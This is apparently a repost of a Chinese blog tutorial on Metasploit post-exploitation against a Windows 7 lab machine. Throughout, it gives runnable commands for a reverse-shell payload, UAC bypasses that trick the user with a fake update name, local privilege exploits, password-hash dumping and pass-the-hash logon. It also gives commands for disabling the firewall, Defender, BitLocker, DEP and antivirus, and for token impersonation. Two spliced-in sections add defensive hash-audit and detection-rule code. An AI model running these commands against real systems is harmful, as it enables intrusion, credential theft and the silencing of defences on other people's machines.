Metasploit Framework: the post-exploitation phase

admin, 6 December 2022, 17:37:36




Foreword

Once a shell has been obtained, the next task is to expand the foothold:

  • privilege escalation

  • information gathering

  • pivoting into the internal network

  • a persistent backdoor

There is quite a lot of material, so I spread it over several days.

1. Preparation

Attacker: Kali
IP: 192.168.1.119

Target: Windows 7
IP: 192.168.1.118

2. Privilege escalation

Starting from an existing session

# Generate the payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
cp payload.exe /var/www/html/
service apache2 start
# Start the listener
service postgresql start
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.119
msf exploit(multi/handler) > exploit -j
# In the Windows 7 browser open 192.168.1.119/payload.exe; once it runs, Kali receives the shell
# Interact with the session
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN7-VM\John
# Attempt privilege escalation
meterpreter > load priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
# Escalation failed; this is usually due to UAC restrictions


Bypassing UAC

The ask module bypasses UAC by getting the Windows 7 user to approve the prompt themselves.

msf > use exploit/windows/local/ask
msf exploit(ask) > set payload windows/meterpreter/reverse_tcp
msf exploit(ask) > set LHOST 192.168.1.119
# give the file a deceptive name
msf exploit(ask) > set FILENAME win_update.exe
# choose the session to work from
msf exploit(ask) > set SESSION 2
msf exploit(ask) > exploit
# the Windows 7 user clicks Yes
meterpreter > getuid
meterpreter > load priv
meterpreter > getsystem
# SYSTEM privileges obtained

bypassuac can also be used:

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 192.168.1.119
msf exploit(bypassuac) > show targets
msf exploit(bypassuac) > exploit
# UAC is bypassed without user interaction
meterpreter > getuid
meterpreter > load priv
meterpreter > getsystem
# SYSTEM privileges obtained


Escalating straight to SYSTEM with a local exploit

msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms13_053_schlamperei) > set SESSION 1
msf exploit(ms13_053_schlamperei) > set LHOST 192.168.1.119
msf exploit(ms13_053_schlamperei) > exploit
meterpreter > getuid
# the new session is already SYSTEM

Other modules such as ms13_097_ie_registry_symlink, ms13_081_track_popup_menu and ppr_flatten_rec exist, but they do not always succeed.

Graphical payload

msf > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set payload windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > set SESSION 1
msf exploit(ppr_flatten_rec) > set LHOST 192.168.1.119
msf exploit(ppr_flatten_rec) > set ViewOnly false
msf exploit(ppr_flatten_rec) > exploit
# this is effectively a remote desktop

3. User logon

# Dump the users and their password hashes
meterpreter > load priv
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Turn off UAC, using the session that already has SYSTEM privileges
msf > sessions -i 2
# open a command shell
meterpreter > shell
# create the registry value with reg
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# UAC is now off
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
# reboot
C:\Windows\system32>shutdown -r -t 0
# Try to log on with the hash
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.118
msf exploit(psexec) > set SMBUser John
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.119
msf exploit(psexec) > exploit
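A defender's reading of the hashdump output above: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so every account in that dump has a blank password, which is why the hash can be reused without cracking anything. The script below is an added example (not code from the original post or from Metasploit) that parses a dump in the same name:RID:LM:NT::: format and reports blank passwords, accounts that still have an LM hash stored, and accounts sharing the same NT hash. The dump it runs on is constructed: the first three lines mirror the output above, the other three are made-up accounts.

```python
"""Audit a hashdump/pwdump-style credential dump for weak password storage.

Added example for this page; not code from the original post or Metasploit.
Input format is the one hashdump prints:  name:RID:LM_hash:NT_hash:::
The two constants are the well-known hashes of an empty password (the NT hash
is MD4 of the empty UTF-16LE string).
"""
from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" (also stored when LM hashing is off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT of ""

# Constructed sample: the first three lines mirror the dump shown in the post, the
# other three are made-up accounts (an LM hash stored, and a password reused twice).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
ops1:1002:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
ops2:1003:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
"""


@dataclass(frozen=True)
class Account:
    name: str
    rid: int
    lm: str
    nt: str


def parse_dump(text: str) -> list[Account]:
    """Parse pwdump lines; blank lines are skipped, malformed lines raise."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError(f"malformed pwdump line: {line!r}")
        accounts.append(Account(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def audit(accounts: list[Account]) -> dict[str, list[str]]:
    """Return {account: [findings]} for the storage weaknesses a defender should fix."""
    findings: dict[str, list[str]] = defaultdict(list)
    by_nt: dict[str, list[str]] = defaultdict(list)
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings[a.name].append("blank password")
        if a.lm != EMPTY_LM:
            findings[a.name].append("LM hash stored (NoLMHash policy not enforced)")
        by_nt[a.nt].append(a.name)
    # NT hashes are unsalted, so identical hashes mean identical passwords.
    # Blank passwords are already reported above and are excluded here.
    for nt, names in by_nt.items():
        if nt != EMPTY_NT and len(names) > 1:
            for n in names:
                others = ", ".join(sorted(set(names) - {n}))
                findings[n].append(f"password shared with {others}")
    return dict(findings)


if __name__ == "__main__":
    for name, reasons in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run against the constructed dump, the audit flags Administrator, Guest and John for blank passwords, svc_backup for a stored LM hash, and ops1/ops2 for a shared password; anything it prints is a finding to remediate, not something to store.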


4. Disabling the various protections

# use the session that already has SYSTEM privileges
msf > sessions -i 2
# open a command shell
meterpreter > shell
# The firewall can be switched off; this needs administrator or SYSTEM privileges
# turn it on:
C:\Windows\system32>netsh advfirewall set allprofiles state on
# turn it off:
C:\Windows\system32>netsh advfirewall set allprofiles state off
# Stop Windows Defender
C:\Windows\system32>net stop windefend
# BitLocker disk encryption is very strong
C:\Windows\system32>manage-bde -off C:
C:\Windows\system32>manage-bde -status C:
# Turn off DEP
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
# Kill antivirus software
C:\Windows\system32>exit
meterpreter > run killav
meterpreter > run post/windows/manage/killav
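Every command in section 3 (turning UAC off through EnableLUA and LocalAccountTokenFilterPolicy) and section 4 (firewall, Defender, BitLocker, DEP) is a process creation that command-line logging records, so this is where a defender can catch the whole sequence. The following is an added example (not code from the original post or from Metasploit) that runs a small set of detection rules over process-creation events. It assumes telemetry such as Sysmon event 1 or Windows event 4688 with command-line auditing enabled, normalised into (timestamp, host, user, command line); the sample events are constructed and include read-only look-alikes (reg QUERY, manage-bde -status, the firewall being turned on) that must not fire. Setting LocalAccountTokenFilterPolicy to 1 is what removes the remote UAC token filter for local accounts, which is why the psexec step in section 3 then works with a local account's hash.

```python
"""Flag defence-tampering commands in process-creation logs.

Added example for this page; not code from the original post or Metasploit.
Assumes process-creation events with full command lines (Sysmon EID 1 or
Windows 4688 with command-line auditing), normalised into ProcEvent.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    host: str
    user: str
    cmdline: str


@dataclass(frozen=True)
class Alert:
    rule: str
    event: ProcEvent


# (rule name, ATT&CK technique, pattern over the command line)
RULES = [
    ("UAC disabled (EnableLUA=0)", "T1548.002",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\Policies\\System\b.*\bEnableLUA\b.*?/d\s+0\b", re.I)),
    ("Remote UAC token filter disabled (LocalAccountTokenFilterPolicy=1)", "T1548.002",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\bLocalAccountTokenFilterPolicy\b.*?/d\s+1\b", re.I)),
    ("Windows Firewall turned off", "T1562.004",
     re.compile(r"\bnetsh(?:\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("Windows Defender service stopped", "T1562.001",
     re.compile(r"\b(?:net1?|sc)(?:\.exe)?\s+stop\s+windefend\b", re.I)),
    ("DEP disabled for the running OS (nx AlwaysOff)", "T1562",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bnx\s+AlwaysOff\b", re.I)),
    ("BitLocker decryption started (manage-bde -off)", "T1562",
     re.compile(r"\bmanage-bde(?:\.exe)?\s+-off\b", re.I)),
]

# Constructed sample events: six tampering commands as run in the post,
# followed by three benign look-alikes that must not produce alerts.
SYSTEM = r"NT AUTHORITY\SYSTEM"
SAMPLE_EVENTS = [
    ProcEvent("2022-12-06T09:31:02", "WIN7-VM", SYSTEM,
              r"cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    ProcEvent("2022-12-06T09:31:05", "WIN7-VM", SYSTEM,
              r"cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"),
    ProcEvent("2022-12-06T09:40:11", "WIN7-VM", SYSTEM, "netsh advfirewall set allprofiles state off"),
    ProcEvent("2022-12-06T09:40:20", "WIN7-VM", SYSTEM, "net stop windefend"),
    ProcEvent("2022-12-06T09:40:35", "WIN7-VM", SYSTEM, "manage-bde -off C:"),
    ProcEvent("2022-12-06T09:40:50", "WIN7-VM", SYSTEM, "bcdedit.exe /set {current} nx AlwaysOff"),
    ProcEvent("2022-12-06T10:02:00", "WIN7-VM", r"WIN7-VM\John",
              r"reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"),
    ProcEvent("2022-12-06T10:02:10", "WIN7-VM", r"WIN7-VM\John", "netsh advfirewall set allprofiles state on"),
    ProcEvent("2022-12-06T10:02:30", "WIN7-VM", r"WIN7-VM\John", "manage-bde -status C:"),
]


def detect(events: list[ProcEvent]) -> list[Alert]:
    """Match every rule against every event's command line; one Alert per match."""
    alerts = []
    for ev in events:
        for name, technique, pattern in RULES:
            if pattern.search(ev.cmdline):
                alerts.append(Alert(f"{technique} {name}", ev))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.event.ts} {a.event.host} {a.event.user}: {a.rule}")
```

On the constructed events the six tampering commands each raise exactly one alert and the three look-alikes raise none. Because the post's sequence runs all of these within minutes from one SYSTEM shell, correlating alerts by host and time window gives a much stronger signal than any single rule.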

5. Enabling the Remote Desktop service

meterpreter > run post/windows/manage/enable_rdp
# take a screenshot
meterpreter > screenshot
# screengrab from the espia extension also takes a screenshot
meterpreter > use espia
meterpreter > screengrab
# connect with remote desktop from Kali
rdesktop 192.168.1.118

6. Tokens

Each time a user logs on, a temporary token is bound to the account.
When resources are accessed, the token is presented for authentication, much like a web cookie.

  • delegate tokens: interactive logon sessions

  • impersonate tokens: non-interactive logon sessions

  • once the account logs off, a delegate token becomes an impersonate token, and its privileges remain valid

Incognito

A standalone tool that msf has integrated into Meterpreter.
It steals tokens to impersonate other users, with no need for a password, for cracking, or for obtaining a password hash.
Particularly suited to escalating privileges across many systems in a domain environment.

meterpreter > load incognito
meterpreter > list_tokens -u
# the backslash between domain and user has to be doubled in the console
meterpreter > impersonate_token lab\\administrator
use exploit/windows/local/ms10_015_kitrap0d
# -t: run the program with the currently impersonated token
meterpreter > execute -f cmd.exe -i -t
meterpreter > shell

Closing remarks

This post was mainly about expanding the foothold after compromise; two or three more posts will follow.

The Honker Security Commando (红客突击队) was founded in 2019, led by team captain k龙 together with graduate students from several top domestic universities. Since its founding the team has taken part in many international cyber-security competitions with good results and has built up extensive competition experience. The team holds to the principle of character first, technique second, and aims to become a world-class security team. In 2022 its core members moved into an information security research institute, providing security services and technical support to government and enterprise.


© Honker Security Commando


Originally published on the WeChat public account (中龙 红客突击队): metasploit framework——后渗透阶段

Reposted at CN-SEC中文网: http://cn-sec.com/archives/1447656.html